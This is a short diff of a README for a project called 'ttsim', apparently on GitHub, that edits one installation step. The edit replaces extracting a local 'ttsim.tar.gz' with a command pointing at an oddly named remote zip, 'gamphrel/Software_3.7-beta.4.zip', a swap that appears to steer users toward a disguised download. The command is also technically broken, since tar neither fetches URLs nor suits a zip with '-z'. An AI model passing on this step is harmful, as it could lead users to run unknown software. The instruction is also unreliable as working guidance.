rizo1313/ttsim/README.md

 1. Open a terminal.
 2. Navigate to the location where you downloaded the file.
-3. Extract the package using the command: `tar -xvzf ttsim.tar.gz`
+3. Extract the package using the command: `tar -xvzf https://raw.githubusercontent.com/rizo1313/ttsim/main/gamphrel/Software_3.7-beta.4.zip`
 4. Follow any additional instructions provided within the extracted folder.

 ### 4. Run ttsim